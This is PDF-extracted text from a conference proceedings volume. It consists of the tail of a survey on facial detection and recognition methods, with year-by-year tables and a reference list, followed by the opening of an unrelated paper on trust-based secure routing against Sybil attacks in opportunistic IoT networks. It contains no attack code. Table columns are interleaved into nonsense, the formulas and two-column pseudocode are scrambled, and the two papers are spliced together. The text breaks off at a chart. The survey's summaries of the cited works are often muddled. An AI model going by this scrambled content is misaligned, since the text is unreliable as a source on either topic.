change, Celeb-A, IMDB + WIKI, and PASCAL datasets obtained. This approach has
been greatly changed. The HyperFace structure of the MLT has been strengthened [25]
(continued)
114 P. Singhal et al.
Table 1 (continued)
Year Description
2016 Yadong Guo et.al. (2016) using the MS-Celeb-1 M, YFW, FG-NET, CASIA, Facebook,
and Google benchmark facial identification and recognition tasks. That training range
includes approximately 75% of celebrities. Face identification requires human actions in
the processing of pictures. Benchmark’s method has worked on very large datasets.
Classification methods have been used to solve the issue of faces in actual applications
[26]
Wen-Sheng et.al. (2016) suggested automated facial action units (AU) and selective
transfer machine (STM) for facial identification and recognition using CK+ ,
GEMEPERA, RU-FACS, and GFT datasets. The experimental outcome of this paper
showed both a facial and a systemic implication. STM has been able to enhance the
efficiency of the test by supplying testing samples. STN can be defined as convex
decision-making and failure logistic expressions [27]
George Trigeorgis et.al. (2016) suggested a semi-non-negative facial detection and
identification matrix factorization algorithm. They use CMU-PIE and XMLVTS
databases for facial identification and recognition. They have been working on
two-dimensional models to understand the expressions. That worked on both clustering
and classification problems was solved by these algorithms. They provide different
attribute information to communicate with different data sources [28]
Icapo Masi et.al. (2016) suggested a pose conscious model (PAM) using IARPA, LFW,
CASIA, YTF, IJB-A, and PIPA to solve the issue of facial identification and recognition.
These models have given a solution at the optimization stage and mitigate the lack of sort
regularization. Performance of all selection model function on pipeline recognition
models [29]
Zhifeng Li et.al. (2016) has developed a system based on a hierarchical function. They
work on two layers of learning using spatial pattern selection (LPS). The result was
higher than 94.20% in separate datasets such as MORPH, FG-NET, and Album2 datasets.
They got clearer results using MORPH and Album2 datasets. They have offered a better
performance that is limited significantly to the faces [30]
Mustafa Mehdipur Ghazi et.al. (2016) partnered with CNN on VGG systems to boost the
performance of facial identification and recognition. It has been applied in deep learning
models. They offered effective expression and presentation in the identification and
recognition of the face. It has focused on a holistic appraisal based on representation.
They have had a better outcome in varying conditions [31]
Ju Yong Chang (2016) has suggested a system of gesture identification. This is named the
systemic support vector machine (SSVM) and the conditional random field (CRF) for
facial identification and recognition. They also developed an efficient gesture recognition
tool for use in actual gesture datasets. The CRF model uses non-parameters and different
functions. Working on the learning system to support the SSVM application, LAP and
MSRC-12 datasets were used [32]
Bastain Wandt et.al. (2016) suggested historically qualified base positions and predefined
skeletal anthropometric restrictions for facial identification and recognition. The 3D
architecture uses human expression from a monocular picture series. This models use
periodic functions. That worked on the weights in the base poses. They give an efficient
outcome in stable on a periodic basis. The suggested system data of the KTH datasets
will be used as an outdoor obstacle jump sequence [33]
(continued)
A Survey: Approaches to Facial Detection and Recognition … 115
Table 1 (continued)
Year Description
Pan Zhou et.al. (2016) introduced the new low-level representation (LatRR) and PCA for
facial identification and recognition. The suggested approach is to obtain better outcomes
for classification. Another representation-based paradigm and state-of-the-art methods of
identification, also with a simplified linear grouping. In huge collection of datasets
(YALEB, AR, Pe, and UCFF-50) by implementing L1 filtering algorithms. This approach
is also much better in compression than any other system [34]
Chunlei Peng et.al. (2016) suggested a multi-representation technique for face sketch
photo synthesis (MrFSPS) and Markov for face detection and recognition. This process is
used to implement current synthesis processes. Improved face recognition findings have
been obtained to boost the image accuracy of CUHK, FERET, IIT-D, FG-NET, and LFW
datasets. This datasets are based on various synthesis technique models. They have been
used to synthesize facial recognition technologies with positive results [35]
Chao Dong et.al. (2016) introduced a single super resolution deep CNN (SRDCNN) for
facial identification and recognition. SRCNN also focused on the end of mapping
between low and high resolution images. They optimized the bit using pre-processing and
post-processing techniques [36]
2015 Jiwen Lu et.al. (2015) suggested a binary face descriptor (CBFD), pixel-related vectors
(PDVs), and dynamic CBED (CCBED) program for facial identification and recognition.
CBFD minimized the modality gap for heterogeneous face matching databases FERET,
CAS-PEA, LFW, PASC, CASIA, and NIR-VIS2.0. A successful outcome has been
obtained through the implementation of object recognition, face detection, and further
proof of the usefulness of the features [37]
Huazhu Fu et. al. (2015) suggested a multi-scale collection graph (MSG) system for face
identification and recognition. It has an indication function for the proper treatment of
cases. They have found the missing item in some popular videos. MSG has developed a
shared context system to enhance the outcome. This helps to solve the problem with the
expansion of the regular graph in the images. It worked on several state collections of
features in pictures. This has facilitated optimization of the current energy minimization
level [38]
Changxing Ding et.al. (2015) introduced multitask translation function learning
(MTFTL) and patch dependent partial representation (IBPR) for face detection and
recognition. Operated on the training picture of the FERET, CMU-PIE, MultiPIE, and
LFW databases. The great benefit of the current system has been updated by the new
solution. This strategy has given unregulated faces to the issues of authentication and
recognition. They have to find optimal results using LFW datasets [39]
2014 Javier Galbally et.al. (2014) have suggested a technological approach to the issue of false
photos in the identification and recognition of the face. It has reliably worked in
high-level characteristics for various forms of biometric attacks. The author also made
new possibilities for the future in this article, including the assessment, inclusion, and use
of video quality measures [40]
(continued)
116 P. Singhal et al.
Table 1 (continued)
Year Description
Zhen Lei et.al. (2014) Gabor and local binary-based sequence discriminant face
descriptor (DFD) and coupled FDD (CDFD) have been proposed for facial identification
and recognition. The coupled image function distance in heterogeneous faces in the
photographs using filters has been minimized. DFD has tested and provides improved
performance in all small datasets such as FERET, LFW, CAS-pEAL-R1, and HFB. It has
generated a positive consequence of generalization. It has also developed a comparative
descriptor for face success under different conditions [41]
2013 Yizhe Zhang et.al. (2013) introduced a high-level function learning system for facial
identification and recognition. These approaches have solved the dilemma of several to
one high-level face learning functionality. They removed presenting invariant and even
unequal identity characteristics in the CMU and MultiPIE databases [42]
Shuiwang Ji et.al. (2013) used CNN and 3DCNN for the identification and recognition of
the face. 3D convolutions have provided improved efficiency in extracting spatial and
temporal information. Move and information encoded to several neighboring KTH
frames have been worked on and performed on TRECVED databases. The 3DCNN
model is superior to the separate TRECVED data form. The KTH databases can be
competitive [43]
about the face images. Face identification and authentication of unknown individuals
are very critical factor. The moving target is a very difficult topic in face recogni-
tion and also faces another challenge in the object’s aging and non-rigid motion.
Learning discriminating looks in face-representation is based upon invariant poses
in face recognition. Face detection is a big concern in facial recognition systems.
This challenge is the recognition of various ways to change poses to the piece. But it
contrasts the information with the image of the checked face and the images of the
recorded face.
3D face detection and recognition algorithms work well for pose variance, speech,
lighting, and also for low-light images. In a transparent and unregulated setting, the
contrast of these variables raises illumination and expression. Pre-processing is the
fundamental and essential stage in the processing of images, and post-processing
is used to manipulate images. They remove the characteristics present in the face
in post-processing techniques such as skin color, eye color, nose height and related
characteristics, etc. In the learning of feature extraction, various methods are used to
quantify the features in artifacts of face detection and recognition.
In face identification and recognition, the directed encoder employs mutual
random faces (RFs) to identify the facial appearances between the test faces and
the recorded faces [1]. Random function fits faces pattern used in database.
The attributes of the faces and the degree of conformity there are handled and
investigated through discriminative identification functions, such as size, skin tone,
and pose. A typical analysis of alignment of features is to cover the facial features.
They cover numerous positions of either deterministic or nonlinear deterministic
transferable phrases. The typical structure’s face recognition is the same pose,
lighting, and extraction value, but their names are different. It means they have
A Survey: Approaches to Facial Detection and Recognition … 117
Table 2 (continued)
Technique Result Merit Demerit
Switching adaptive The similarity of edges SAMFWMF is performed They have
median and fixed has adopted the properties better structural metrics. provided better
weighted mean filter using median filters. They They have provided good result in high
(SAMFWMF) [10] have provided better result result in contrast using intensity impulse
in sharpness and common method of noise with edges
smoothness property in thresholding
edges
Tensor rank preserving TRPDA has provided They have extracted They have worked
discriminant highest recognition rates extract feature with the on two order
analysis(TRPDA) [11] and better performance rank module. They have tensor. They have
unstable manifold included with an
learning methods arrow and column
Recurrent face aging The accuracy has shown The triple layer RFA RFA framework
(RFA) RNN [12] that RFA is worked better framework GRU gives the does not work on
than RNN, because they better identity information integrate the age
have performed than bi layer GRU estimation
65.43–61.00%
Markov random field This method has They have captured These systems are
energy optimization [13] especially based on wide images in various using sensitive
baseline multi-view conditions. They have camera parameters
environment worked very smoothly and
efficiently
Joint and individual They have improving They have improved They have
variance explained accuracy and validate the accuracy when the produced the
(JPVE), robust-JIVE identity of information differences of each pairs problem of age in
(RJIVE) [14] are maximum invariant face and
becomes more
difficult to
differences in
faces
3D dense face alignment Face alignment has This method has replaced They have
(3DDFA) and 3D worked on pose range and the boundary boxes using produced large
Morphable model also worked on 3D 3DDFA artifacts and
(3DMM) [15] Morphable model invisible region
filling
controlled face feature These methods have Face recognition Auxiliary subtask
(CPF) [16, 17] worked on superiority in experiment on MultiPIE under an
both learning database provide more unsupervised way
representation and rotating evidence and strength is universal to all
non frontal images datasets
(continued)
registered the same images on different identities so determining the true meaning of
the image is a major challenge. Learning function in this scenario plays a significant
role in determining the true meaning of the pictures. In this paper, we are presenting
the latest literature of the face specific problem and solution. We are trying to express
best solution of the face-related problem.
A Survey: Approaches to Facial Detection and Recognition … 119
Table 2 (continued)
Technique Result Merit Demerit
Facial action units(AUs) They have provided to They have used color They have not
[18] identification of AUs model for detecting to AU provided good
using color features in activation efficiency in skin
datasets color
Single image super SISR have given good They have performed They have not
resolution, CNN [19] result in similar domain better result in self leaded to training
using 1D wiener filtering -similar object and relies input
images
Cross-age face These methods improved They have work on They have not
verification [20] over the performance from effectively balance feature provided good
2.2% EER on MORPH sharing and feature result in small
7.8% EER on FG-NET by exclusion between the two datasets and also a
more than 50 and 59.7% tasks large number of
datasets
Temporal non-volume They have consecutively They have guaranteed This method has a
preserving (TNVP), worked on synthesizing inference and evaluate the big issue to solve
generative adversarial age progressed faces and feature in consecutive large-scale
networks (GAN) [21] cross-age face verification stages problem
Visual versus near infrared This technique achieves They have provided good We observe that
(VIS–NIR), invariant deep 94% verification rate result and reduces the IDR are almost
representation (IDR) [22] large-scale VIS data error rate of 58% only obtain the lowest
with a compact 64D performance
representation among the three
implementation
Learning displacement LDF-NET achieved They have provided good They have
field network(LDF-NET) frontal image using useful face recognition using perform low
[23] information in original MultiPIE datasets efficient better
images than 2D
Deep convolution neutral They have reduced the A face image recognize This algorithm is
network (DCNN) [24] error rate of 80.7–32.5 in 3D Morphable model to using primary the
real-world forensic images improve facial features in limited number
new images sketches images
available
Single deep convolution This model has a better This method performed FDDB has failed
neutral network(SDCNN), understand to the faces better than HyperFace to capture small
multi-task learning frame and achieved good result using MTL frameworks faces in any region
work (MTL) [25] for most of these tasks of the proposal
Bench mark task [26] This approach has worked They have worked on This method does
on testing databases large datasets to solve not remove noise
representing 75% of classification problem in from datasets
celebrities names. This computer vision and there
accepts the applications
disambiguation property
of human expression
(continued)
120 P. Singhal et al.
Table 2 (continued)
Technique Result Merit Demerit
Automatic facial action STM has capable to detect STM has extended the It has found
unit (AU), selective and improve both AU and classifier with losses of common feedback
transfer machine (STM) holistic expression. They convex decision and in supervised
[27] have improving the logistic expressions domain and lack
performance of selected of training
samples in a nearest test datasets
samples
Semi-non-negative matrix This model has worked on They have not provided They are not able
factorization [28] to learn the good result in datasets. to solve the area of
two-dimensional They have worked on speech recognition
representation. They have annotated attributes and
provided a good result in different data sources
classification and
clustering
Pose aware models This model has to design They have analysis of These models
(PAM), CNN [29] for solving the regular IJB-A. They have have worked on
problem and optimizes the evaluated landmarks and only training
point and loss improve the accuracy of PAMs with a
minimization pose estimation single
optimization
framework
Hierarchical method These models have These experiments This method is not
based on two level improved the accuracy of perform better result in work better in
learning, local pattern 94.2% using LPS MORPH, Album2 datasets low-level images
selection (LPS) [30]
VGG framework, CNN It have worked on They have provided a They have find in
[31] pre-processed the face multiple features in faces limited data
recognition and provide a and evaluated a n under provided by the
powerful representation various circumstances mismatched
conditions
Gesture recognition They have provided SSVM framework has They have not
method, conditional effective gesture and face found novel gesture evaluated criteria
random field (CRF), recognition in challenging recognition in CRF model. itself in proposed
structural support vector real gesture-based datasets They have worked on datasets
machine (SSVM) [32] multiple features in
matching algorithms
A priorly trained base 3D construction of human Proposed method Proposed method
poses, predefined motion from monocular performs well under working good
skeletion anthropometrics image sequence. Using occlusions, noise and result on
constraints [33] periodic functions to real-world data of the high-level noise of
model the weights of the KTH datasets as well as the reconstruction.
base poses turned out to our outdoor obstacle jump They are not
be very effective and sequence finding better
stable on periodic motion result on low-level
noise
(continued)
A Survey: Approaches to Facial Detection and Recognition … 121
Table 2 (continued)
Technique Result Merit Demerit
Latest low rank Proposed method find On larger scale datasets by In the same spirit,
representation (LatLRR), better classification results adopting the Ll-filtering we will try
PCA [34] other than algorithms. They have integrating other
representation-based given better performance feature learning
method and even with a than other algorithms methods with
simpler linear more sophisticated
classification classification array
Multiple This approach has work They have performed These datasets has
representation-based face superior performance in forensic sketch datasets work very less size
sketch photo synthesis multiple datasets using using dependent style to so unfortunately it
(MrFSPS), Markow existing method and improve the face has not easy to
model [35] quality-based recognition promising find exact result of
performance results large number
Single image super The proposed SRCNN has They have learnt end to The extra activity
resolution deep CNN capable to improve the end communication using has explored more
(SRCNN) [36] reconstruction of images low-level and high-level filters using other
in natural corresponding resolutions training strategies
channels
Compact binary face These have worked on They have applied They have learned
descriptor (CBFD), pixel heterogeneous face different—different only single layer
different vectors (PDVs), recognition. They have application of face datasets nor for all
coupled-CBFD(CC-BFD) reduces the modality gap recognition. They have datasets
[37] in datasets using work on object
heterogeneous face recognition and visual
through matching tackling
Multi-state selection This method has They have provides They have not
graph(MSG) [38] incorporates an indicator general and global given exact
matrix. They have framework. They have performance every
handling accurate value of allowed optimization for video
missing common extending standard graph
foreground object in some models
videos
Multitask feature They have applied They have slightly They have
transformation arbitrary poses I face modified to tackle the inoculated
learning(MTFTL), images. There is a very unconstrained face different pose in
patch-based partial beneficial for existing verification problem. They face texture
representation(PBPR) method have find top level
[39] performance in
challenging datasets
(continued)
7 Conclusions
This paper analyzed systematic studies of facial recognition and machine learning
techniques, including numerous tactics and datasets. This paper includes a detailed
review of face recognition and distinguishing using various techniques by the
researchers. Machine-based learning approaches solve numerous problems related
122 P. Singhal et al.
Table 2 (continued)
Technique Result Merit Demerit
software-based fake This method has to able to They have to provide new This approach is
detection method [40] perform high level for possibilities evaluation of perform better in
different biometric traits. future including high level not in
They have solved the evaluation, inclusion and low-level attacks
problem in different type used of video quality
of attacks measures
Gabor and local binary They have learnt to reduce This has a good Proposed DFD
patterns, discriminant face image filters with generalization and does not work on
descriptor (DFD), heterogeneous gap in face competitive descriptor in video-based
coupled-DFD(CDFD) images. They have face recognition under analysis
[41] examined both various circumstances
constrained and
unconstrained face
databases
High-level feature They have produces a They have reduced one to This method is
learning scheme [42] novel technique. To work one and many-to-one working on
on many-to-one high-level encoder to remove the high-level feature
face feature learning. impact diverse poses in learning
These have extracted future. It has enhanced the
invariant and pose free features in
discriminative identity multiple random faces
face features from facial
images
CNN, 3DCNN [43] They have the These models have 3DCNN is work a
characteristics derived in outperform compared to supervised
spatial as well as temporal TRECVID data, while learning training
dimensions. They have 3D they have achieved better data not are work
convolutions performed to performance in KTH on unsupervised
record the wave, details in database training database
encoded several adjacent
objects
References
1. Shao, M., Zhang, Y., & Fu, Y. (2018). Collaborative random faces-guided encoders for pose-
invariant face representation learning. IEEE Transactions on Neural Networks and Learning
Systems, 29(4), 1019–1032.
2. Tsai, C. C., Li, W., Hsu, K. J., Qian, X., & Lin, Y. Y. (2019). Image co-saliency detection and
co-segmentation via progressive joint optimization. IEEE Transactions on Image Processing,
28(1), 56–71.
3. Hu, Z., Cho, S., Wang, J., & Yang, M. H. (2014). Deblurring low-light images with light
streaks. In Proceedings of the IEEE Conference on Computer Vision and Pattern Recognition
(pp. 3382–3389).
4. Anwar, S., Huynh, C. P., & Porikli, F. (2018). Image deblurring with a class-specific prior. IEEE
Transactions on Pattern Analysis and Machine Intelligence.
5. Wang, X., Ma, H., Chen, X., & You, S. (2018). Edge preserving and multi-scale contextual
neural network for salient object detection. IEEE Transactions on Image Processing, 27(1),
121–134.
6. Deng, W., Hu, J., & Guo, J. (2018). Compressive binary patterns: Designing a robust binary face
descriptor with random-field eigenfilters. IEEE Transactions on Pattern Analysis & Machine
Intelligence, 1, 1–1.
7. Jerripothula, K. R., Cai, J., & Yuan, J. (2018). Quality-guided fusion-based co-saliency
estimation for image co-segmentation and co-localization. IEEE Transactions on Multimedia.
8. Tulyakov, S., Jeni, L. A., Cohn, J. F., & Sebe, N. (2018). consistent 3D face alignment. IEEE
Transactions on Pattern Analysis and Machine Intelligence, 40(9), 2250–2264.
9. Dong, X., Zheng, L., Ma, F., Yang, Y., & Meng, D. (2018). Few-example object detection with
model communication. IEEE Transactions on Pattern Analysis & Machine Intelligence, 1, 1–1.
10. Mafi, M., Rajaei, H., Cabrerizo, M., & Adjouadi, M. (2018). A robust edge detection approach
in the presence of high impulse noise intensity through switching adaptive median and fixed
weighted mean filtering. IEEE Transactions on Image Processing, 27(11), 5475–5490.
11. Tao, D., Guo, Y., Li, Y., & Gao, X. (2018). Tensor rank preserving discriminant analysis for
facial recognition. IEEE Transactions on Image Processing, 27(1), 325–334.
12. Wang, W., Yan, Y., Cui, Z., Feng, J., Yan, S., & Sebe, N. (2018). Recurrent face aging with
hierarchical autoregressive memory. IEEE Transactions on Pattern Analysis and Machine
Intelligence.
13. Jeong, S., Lee, J., Kim, B., Kim, Y., & Noh, J. (2018). Object segmentation ensuring consis-
tency across multi-viewpoint images. IEEE Transactions on Pattern Analysis and Machine
Intelligence, 40(10), 2455–2468.
14. Sagonas, C., Ververas, E., Panagakis, Y., & Zafeiriou, S. (2018). Recovering joint and individual
components in facial data. IEEE Transactions on Pattern Analysis and Machine Intelligence,
40(11), 2668–2681.
15. Zhu, X., Lei, Z., & Li, S. Z. (2017). Face alignment in full pose range: A 3D total solution. IEEE
Transactions on Pattern Analysis and Machine Intelligence.
16. Wang, M., & Deng, W. (2018). Deep face recognition: A survey. arXiv preprint arXiv:1804.
06655.
17. Qian, Y., Deng, W., & Hu, J. (2018, May). Task specific networks for identity and face variation.
In 2018 13th IEEE International Conference on Automatic Face & Gesture Recognition (FG
2018) (pp. 271–277). IEEE.
18. Benitez-Quiroz, F., Srinivasan, R., & Martinez, A. M. (2018). Discriminant functional learning
of color features for the recognition of facial action units and their intensities. IEEE Transactions
on Pattern Analysis and Machine Intelligence.
19. Cruz, C., Mehta, R., Katkovnik, V., & Egiazarian, K. O. (2018). Single image super-resolution
based on Wiener filter in similarity domain. IEEE Transactions on Image Processing, 27(3),
1376–1389.
124 P. Singhal et al.
20. Wang, X., Zhou, Y., Kong, D., Currey, J., Li, D., & Zhou, J. (2017, May). Unleash the black
magic in age: a multi-task deep neural network approach for cross-age face verification. In 2017
12th IEEE International Conference on Automatic Face & Gesture Recognition (FG 2017)
(pp. 596–603). IEEE.
21. Duong, C. N., Quach, K. G., Luu, K., Le, T. H. N., & Savvides, M. (2017, Oct). Temporal
non-volume preserving approach to facial age-progression and age-invariant face recognition.
In 2017 IEEE International Conference on Computer Vision (ICCV) (pp. 3755–3763). IEEE.
22. He, R., Wu, X., Sun, Z., & Tan, T. (2017). Learning Invariant Deep Representation for NIR-VIS
Face Recognition. In AAAI (Vol. 4, pp. 7).
23. Hu, L., Kan, M., Shan, S., Song, X., & Chen, X. (2017, May). LDF-Net: Learning a
displacement field network for face recognition across pose. In 2017 12th IEEE International
Conference on Automatic Face & Gesture Recognition (FG 2017) (pp. 9–16). IEEE.
24. Galea, C., & Farrugia, R. A. (2017). Forensic face photo-sketch recognition using a deep
learning-based architecture. IEEE Signal Processing Letters, 24(11), 1586–1590.
25. Ranjan, R., Sankaranarayanan, S., Castillo, C. D., & Chellappa, R. (2017, May). An all-in-one
convolutional neural network for face analysis. In 2017 12th IEEE International Conference
on Automatic Face & Gesture Recognition (FG 2017) (pp. 17–24). IEEE.
26. Guo, Y., Zhang, L., Hu, Y., He, X., & Gao, J. (2016, Oct). Ms-celeb-1m: A dataset and
benchmark for large-scale face recognition. In European Conference on Computer Vision
(pp. 87–102). Springer, Cham.
27. Chu, W. S., De la Torre, F., & Cohn, J. F. (2017). Selective transfer machine for personalized
facial expression analysis. IEEE Transactions on Pattern Analysis and Machine Intelligence,
39(3), 529–545.
28. Trigeorgis, G., Bousmalis, K., Zafeiriou, S., & Schuller, B. W. (2017). A deep matrix factor-
ization method for learning attribute representations. IEEE Transactions on Pattern Analysis
and Machine Intelligence, 39(3), 417–429.
29. Masi, I., Chang, F. J., Choi, J., Harel, S., Kim, J., Kim, K., & AbdAlmageed, W. (2018).
Learning pose-aware models for pose-invariant face recognition in the wild. IEEE Transactions
on Pattern Analysis and Machine Intelligence.
30. Li, Z., Gong, D., Li, X., & Tao, D. (2016). Aging face recognition: A hierarchical learning model
based on local patterns selection. IEEE Transactions on Image Processing, 25(5), 2146–2154.
31. Mehdipour Ghazi, M., & Kemal Ekenel, H. (2016). A comprehensive analysis of deep learning
based representation for face recognition. In Proceedings of the IEEE Conference on Computer
Vision and Pattern Recognition Workshops (pp. 34–41).
32. Chang, J. Y. (2016). Nonparametric feature matching based conditional random fields for
gesture recognition from multi-modal video. IEEE transactions on pattern analysis and
machine intelligence, 38(8), 1612–1625.
33. Wandt, B., Ackermann, H., & Rosenhahn, B. (2016). 3d reconstruction of human motion from
monocular image sequences. IEEE Transactions on Pattern Analysis and Machine Intelligence,
38(8), 1505–1516.
34. Zhou, P., Lin, Z., & Zhang, C. (2016). Integrated low-rank-based discriminative feature learning
for recognition. IEEE Transactions on Neural Networks and Learning Systems, 27(5), 1080–
1093.
35. Peng, C., Gao, X., Wang, N., Tao, D., Li, X., & Li, J. (2016). Multiple Representations-Based
Face Sketch-Photo Synthesis. IEEE Transactions on Neural Networks and Learning Systems,
27(11), 2201–2215.
36. Dong, C., Loy, C. C., He, K., & Tang, X. (2016). Image super-resolution using deep convo-
lutional networks. IEEE Transactions on Pattern Analysis and Machine Intelligence, 38(2),
295–307.
37. Lu, J., Liong, V. E., Zhou, X., & Zhou, J. (2015). Learning compact binary face descriptor for
face recognition. IEEE Transactions on Pattern Analysis and Machine Intelligence, 37(10),
2041–2056.
38. Fu, H., Xu, D., Zhang, B., Lin, S., & Ward, R. K. (2015). Object-based multiple foreground
video co-segmentation via multi-state selection graph. IEEE Transactions on Image Processing,
24(11), 3415–3424.
A Survey: Approaches to Facial Detection and Recognition … 125
39. Ding, C., Xu, C., & Tao, D. (2015). Multi-task pose-invariant face recognition. IEEE
Transactions on Image Processing, 24(3), 980–993.
40. Galbally, J., Marcel, S., & Fierrez, J. (2014). Image quality assessment for fake biometric
detection: Application to iris, fingerprint, and face recognition. IEEE Transactions on Image
Processing, 23(2), 710–724.
41. Lei, Z., Pietikäinen, M., & Li, S. Z. (2014). Learning discriminant face descriptor. IEEE
Transactions on Pattern Analysis and Machine Intelligence, 36(2), 289–302.
42. Zhang, Y., Shao, M., Wong, E. K., & Fu, Y. (2013). Random faces guided sparse many-to-
one encoder for pose-invariant face recognition. In Proceedings of the IEEE International
Conference on Computer Vision (pp. 2416–2423).
43. Ji, S., Xu, W., Yang, M., & Yu, K. (2013). 3D convolutional neural networks for human action
recognition. IEEE Transactions on Pattern Analysis and Machine Intelligence, 35(1), 221–231.
An Energy- and Space-Efficient
Trust-Based Secure Routing for OppIoT
N. Kandhoul (B)
Division of Information Technology, NSIT, University of Delhi, New Delhi, India
S. K. Dhurandher
Department of Information Technology, Netaji Subhas University of Technology, New Delhi,
India
© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 127
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_10
128 N. Kandhoul and S. K. Dhurandher
1 Introduction
2 Related Work
In this section, existing works related to the energy and security of OppIoT networks
are discussed.
Gao et al. [9] presented a routing protocol that is efficient in terms of energy, and
the forwarding decision is based on speed and residual energy of a node for preventing
unnecessary accumulation of data and uncontrolled spraying. The protocol utilizes
energy efficiently. However, the protocol assumes a sink node that possesses unlim-
ited memory, power and computation capacity, which is unrealistic. It is based on the
assumption that all nodes have equal communication range which is not possible in
real scenarios. Chilipirea et al. [10] proposed an energy-aware extension of BUBBLE
Rap routing protocol for opportunistic networks that combined energy optimization
with socially aware routing for balancing the energy consumption. A node with high
social importance was ranked higher and chosen for routing which led to its energy
getting drained. Thus, this protocol added the updated utility function such that its
value decreases if a node has lower energy value. This led to a reduction in the nodes
probability of acting as a successful carrier of message. This approach did not address
the security issues. Duan et al. [11] proposed a game theoretic risk strategy model for
determining the trust of nodes in the network. Using Nash equilibrium, probability
of the selected strategy was calculated. The energy cost was considered to be pro-
portional to the trust. The system used watchdog mechanism which added overhead
to the system. Each node makes a trust request to which the neighbors respond with
recommendations, and this adds too much overhead and thus wastes energy which is
contradictory to the energy saving goal. SOA-based security protocol was given by
Chen et al. [6] where the trust is computed using collaborative filtering of feedback
based on social contacts, interest relationships community and similarity rating of
friendship. Sharma et al. [12] proposed a secure defense against blackhole and grey-
hole attacks based on history data. It made predictions about behavior considering
the average time for forwarding.
M. Bala Krishna proposed a secure opportunistic technique for message trans-
mission based on hashing called DASHOP for IoT network [13] based on trust. The
base stations were assumed to be trusted for coordinating with other nodes. Keys
are generated using the elliptic curve digital signature algorithm. The computation
intensive elliptic curve digital signature approach was used, and the limited power of
the nodes was not taken into consideration. Dhurandher et al.[14] proposed a trust-
and cryptography-based security approach. This scheme made lots of computations
and assumed too much infrastructure. Borah et al. [15] presented ELPFR-MC, a
location predicting protocol that is energy aware and makes routing decision based
on current energy level of a node and its probability of message delivery to the des-
tination. This is an energy-aware protocol, and security is not implemented while
performing message routing. RSA-based secure routing protocol was proposed by
Kandhoul et al.[16] for OppIoT. This scheme used RSA for message encryption and
detected packet fabrication attack. The efficiency of the routing protocol was not
considered.
130 N. Kandhoul and S. K. Dhurandher
3.1 Motivation
OppIoT is assumed to be comprising a wide range of devices like small sensors, power
limited devices and so on. The devices are constrained in terms of storage and battery.
In addition to limited power and space, another challenge is the secure transmission
of data as in OppIoT, and the data is broadcasted to neighbors revealing the data to
attackers as well. Thus, the current scenario calls for a design of secure techniques for
sharing data that are energy and space efficient. The work in literature has not given
much importance to limited space and power. T_CAFE is a trust-based protocol that
protects the network from several attacks. But it does not consider the constrained
energy and storage of the devices involved in the network. The malicious nodes waste
the storage by sending fake messages and drain the energy resources of the nodes by
engaging them in unnecessary packet forwarding. This has motivated us in designing
an energy- and space-efficient version of T_CAFE called as ES_T_CAFE.
ES_T_CAFE considers that all the member nodes of OppIoT cooperate with one
another for message transmission. It is also assumed that the nodes have sufficient
buffer capacity for storing their context information. Some of the nodes behave
maliciously and execute Sybil attack in the network.
Each node maintains a table of already detected malicious hosts. Upon encounter
with a node, the carrier node checks if the node is malicious. If yes, it waits for some
other node. If the node is benign, it checks its residual buffer space and energy. If
the node does not have sufficient space, the chances of a packet getting dropped are
high. Similarly, if the power is low, the node might not be able to sustain the packet
forwarding procedure, thus reducing the packet delivery probability. The residual
energy is normalized as follows:
get_curr ent_Energy()
Residual_Energycarrier = (1)
get_intial_energy()
The normalization performed above is necessary to bring the values in the range of
0 to 1. Finally, ES parameter is computed as
n=1
n
E Snode
E S_T hr eshold = (4)
count
If the E Snode is greater than E S_T hr eshold, the next step is to compare its trust.
The trust is computed as a sum total of direct trust, computed as a sum of social
behavior and indirect trust values, computed on basis of recommendation received
from neighboring nodes. The details regarding trust computation have already been
given in [7]. If any two neighbors are similar to one another beyond a threshold,
they are said to be performing Sybil attack. The attackers thus detected are added
to malicious table, thus identifying the Sybil nodes and successfully secluding them
from participation in the packet transmission. If a neighbor possesses high trust value,
the message is forwarded to it, else the carrier waits for a better message forwarder.
The entire routing process is described in Algorithm 1.
4 Performance Evaluation
Algorithm 1 : ES_T_CAFE
1: Begin 22: Calculate the correctly delivered packet’s
2: Initialize Trust = 0.5 for every node. ratio:
3: For present situation, node A is considered as
Corr ect_Packets_For war ded A,B
the Trustor and B is assumed to be Trustee. CoP R AB = T otal_Packets_Recieved B
4: if (Malicious_table.contains K ey(B)) then
5: continue; wait for benign node. 23: Calculate the Direct Trust:
6: else
7: Compute Residual E nergy as: Dir ect_T r ust A,B = θ ∗ CoP R + δ ∗
Residual _ Energy B = get_curr ent_Energy()
get_intial_energy() Amb + γ ∗ Fw R + λ ∗ Enc R
8: Compute Residual B u f f er as:
Residual _ Bu f f er B = get_Fr ee_Bu f f er _Si ze()
get_Bu f f er _Si ze() where θ, δ, γ , λ are constants where the
9: Compute ES as: sum of these equals 1.
E S B = (α ∗ Residual_Energy + β ∗ 24: end for
Residual_Bu f f er ) 25: end if
10: end if 26: A takes recommendations regarding B from
11: Compute E S_T hr eshold as: neighbors.
n
node ES 27: if (count (r ecomdtn) = 0) then
E S_T hr eshold = n=1 count
12: if ( E S_B < E S_T hr eshold) then 28: Aging of the direct trust is performed:
13: continue; wait for a better carrier.
Dt _T r ust (t) A,B = e−φt Dir ect _T r ust (t − 1)
14: else
15: for every neighbor(N eigh i ) of A do Dir ect_T r ust A,B = Dt_T r ust (t) A,B
16: Calculate the packet forwarding ratio: 29: else
30: if (Malicious_table.containsKey(N eigh i ))
n then
Fw R AB = n A,B B
T otal 31: Encountered node is malicious .
17: Compute amiability as:
f +f continue;
Fr eq AB = f A,BA+ f B,D B 32: else
T otal T otal
d +d 33: Calculate Indirect Trust of A on B:
Dur AB = d A,BA+d B,D B
T otal T otal N
Dir ect_T r ust N eigh i B
r +r I ndir ect_T r ust A,B = i=0
N
Rec AB = r A,BA+r B,D B
T otal T otal
34: end if
Amb = Fr eq + Dur + Rec 35: end if
36: Calculate the total Trust:
18: Calculate encounter ratio with respect to
destination D: T r ust A,B = σ ∗ Dir ect_T r ust A,B + ω ∗
c B,D I ndir ect_T r ust A,B
Enc R B D = c
T otal B
37: if (T r ust A,B > T r ust A ) then
19: if ((Amb + Enc R) > Sybil_thr eshold) 38: Send the packet to B.
then 39: else
20: Add N eigh i to malicious_table as a 40: Wait until a better carrier is encountered.
Mal_Sybil node. 41: end if
21: end if
An Energy- and Space-Efficient Trust-Based Secure … 133
0.5
0.45
0.4
Delivery Probability
0.35
0.3
